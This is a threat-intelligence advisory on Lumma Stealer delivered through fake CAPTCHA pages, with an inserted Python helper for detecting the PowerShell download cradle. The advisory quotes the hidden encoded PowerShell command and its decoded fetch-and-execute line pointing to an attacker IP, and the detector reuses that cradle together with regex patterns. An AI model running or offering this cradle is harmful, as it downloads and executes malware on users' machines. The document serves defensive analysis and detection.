Unmasking the Danger: Lumma Stealer Malware Exploits Fake CAPTCHA Pages
The Lumma Stealer malware is being distributed through deceptive human verification pages that trick users into running malicious PowerShell commands. This phishing campaign primarily targets Windows users and can lead to the theft of sensitive information
Category: Adversary Intelligence
Industry: Multiple
Motivation: Cyber Crime/Financial
Region: Global
TLP: GREEN
Executive Summary
A new and sophisticated method of distributing Lumma Stealer malware has been uncovered, targeting Windows users through deceptive human verification pages. This technique, initially discovered by Unit42 at Palo Alto Networks, has prompted further investigation into similar malicious sites.
After our investigation, we identified more active malicious sites spreading Lumma Stealer. While this technique is currently being used to distribute Lumma Stealer, it could equally be leveraged to deliver any type of malware to unsuspecting users.
Flow of the Phishing Campaign and Malware Infection
Analysis and Attribution
Modus Operandi
Threat actors create phishing sites hosted on various providers, often utilizing Content Delivery Networks (CDNs). These sites present users with a fake Google CAPTCHA page.
Upon clicking the "Verify" button, users are presented with unusual instructions:
Open the Run dialog (Win+R)
Press Ctrl+V
Hit Enter
Unbeknownst to the user, this action executes a hidden JavaScript function that copies a base64-encoded PowerShell command to the clipboard.
The PowerShell command, when executed, downloads the Lumma Stealer malware from a remote server.
Technical Analysis
Our research team identified multiple domains hosting these malicious verification pages. The infection chain typically follows this pattern:
User visits the fake verification page
Phishing page displaying the deceptive Google CAPTCHA verification prompt
The PowerShell script is copied to the clipboard when the user clicks the “I’m not a robot” button; inspecting the source code of the phishing sites also reveals the command being copied.
Verification steps requested by the deceptive sites
Once the user pastes the PowerShell command into the Run dialog box, PowerShell launches in a hidden window and executes the Base64-encoded command: powershell -w hidden -eC
The decoded Base64 command, iex (iwr http://165.227.121.41/a.txt -UseBasicParsing).Content, fetches the contents of the a.txt file hosted on the remote server and then executes them with Invoke-Expression (iex).
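As an added, defender-side example that is not part of the original report: a Python triage helper that decodes the -eC payload from a PowerShell process-creation command line and flags the combination described above (hidden window, encoded command, fetch-then-Invoke-Expression cradle, explorer.exe parent as produced by the Run dialog). The log records are constructed for this example; the decoded command is the one quoted above.

```python
import base64
import re

# Encode text the way -EncodedCommand expects: UTF-16LE, then base64.
def _encode(ps_command):
    return base64.b64encode(ps_command.encode("utf-16-le")).decode("ascii")

# Constructed process-creation records shaped like Sysmon Event ID 1 rows (not real
# telemetry). The first reproduces the page's cradle; the second is a benign control.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "cmdline": "powershell -w hidden -eC "
     + _encode("iex (iwr http://165.227.121.41/a.txt -UseBasicParsing).Content")},
    {"parent": "explorer.exe", "cmdline": "powershell -w hidden -eC " + _encode("Get-Date")},
]
EXEC_RE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
DOWNLOAD_RE = re.compile(r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring)\b", re.I)

def _is_prefix_flag(token, full_flag):
    """PowerShell accepts any unambiguous prefix of a switch (-w, -win, -enc ...)."""
    return token.startswith("-") and len(token) > 1 and full_flag.startswith(token.lower())

def has_hidden_window(cmdline):
    tokens = cmdline.lower().split()
    return any(_is_prefix_flag(t, "-windowstyle") and tokens[i + 1] == "hidden"
               for i, t in enumerate(tokens[:-1]))

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    tokens = cmdline.split()
    for i, t in enumerate(tokens[:-1]):
        if t.lower() == "-ec" or _is_prefix_flag(t, "-encodedcommand"):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None

def assess(event):
    """Return the indicators this record triggers, in a fixed order."""
    hits, cmd = [], event["cmdline"]
    if has_hidden_window(cmd):
        hits.append("hidden_window")
    payload = decode_encoded_command(cmd)
    if payload is not None:
        hits.append("encoded_command")
        if EXEC_RE.search(payload) and DOWNLOAD_RE.search(payload):
            hits.append("download_cradle")  # fetch-then-Invoke-Expression pattern
    if event["parent"].lower() == "explorer.exe":
        hits.append("explorer_parent")  # what a Win+R Run-dialog launch looks like
    return hits

def is_fake_captcha_chain(event):
    return {"hidden_window", "encoded_command", "download_cradle"} <= set(assess(event))
```

The decoded payload is what analysts should pivot on; the raw base64 string changes with every URL, while the iex/iwr cradle does not.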
Further commands in a.txt that download the malicious file
If the downloaded file (dengo.zip) is extracted and executed on a Windows machine, the Lumma Stealer becomes operational and establishes connections with attacker-controlled domains.
Notable Observations
Malicious pages were found on various platforms, including Amazon S3 buckets and CDN providers
The use of base64 encoding and clipboard manipulation demonstrates the attackers' efforts to evade detection
The initial executable often downloads additional components, complicating analysis and potentially allowing for modular functionality
Although this campaign primarily targets distributing Lumma Stealer malware, it has the potential to deceive users into downloading various types of malicious files onto their Windows devices.
Recommendations
Educate employees and users about this new social engineering tactic, emphasizing the danger of copying and pasting unknown commands.
Implement and maintain robust endpoint protection solutions capable of detecting and blocking PowerShell-based attacks.
Monitor network traffic for suspicious connections to newly registered or uncommon domains.
Regularly update and patch all systems to mitigate potential vulnerabilities exploited by the Lumma Stealer malware.